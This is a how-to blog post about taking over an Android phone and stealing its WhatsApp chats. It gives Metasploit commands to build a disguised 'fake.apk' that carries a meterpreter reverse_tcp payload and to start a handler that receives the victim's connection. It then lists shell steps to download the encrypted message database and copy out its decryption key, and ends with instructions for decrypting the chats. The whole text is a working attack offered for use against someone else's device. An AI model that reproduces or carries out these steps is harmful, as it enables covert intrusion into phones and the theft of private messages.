How To Remotely Decrypt The Whatsapp Database "crypt8"

Before starting the database decryption process,first obtain remote access to android device:

1. Start terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=81 R > fake.apk

[ Lhost=Attacker IP address, Lport=local port ]
This command will generate fake.apk in home directory.

2. Type: msfconsole
This command will start the metasploit framework.

3. Type: use exploit/multi/handler
In order to get multiple session on a single multi/handler.

4. Type: set payload android/meterpreter/reverse_tcp
This will provide the reverse connection from victim to attacker computer.

5. Type: show options
It will show the available options like lhost,lport

6. Set LHOST=

7. Set LPORT=81


Now Run the app created in step 1 on your android phone and you'll get a meterpreter session 

Also see:How to hack wifi using social engineering technique

After getting the meterpreter session type below command to download the file:
  • cd /
  • cd /sdcard/WhatsApp
  • ls (Print the current directory)
  • cd Databases
  • download msgstore.db.crypt8 (This will take time, maybe a LOT)
So, the database has been downloaded, now we need key to decrypt the database.
Follow the below command to Obtain the key for databases
  • cd /
  • cd /data/data
  • ls
  • cd com.whatsapp
  • ls
  • cd files
  • ls
  • cp key /sdcard/Download
(Means copy the file 'key' to sdcard>Download folder)

After obtaining the databases and key,Download the simple Github tool to decrpt the databases:
  • Open the application (in windows).
  • Click FIle, then on 'Decrypt .crypt8'
  • In the box, provide the Key file and Database.
  • Click OK, you will see that a 'msgstore.decrypted' file has appeared at your desktop.

  • Open it using the same application, go to 'File' then 'Open'.
  • Provide the Decrypted file generated on desktop, leave the Account name and  the 'wa.db', blank
  • Click 'OK'
  • Now you will see the contact no with the chat details
Note: Rooted smartphone is required to gain database and key from smartphone.

Post a Comment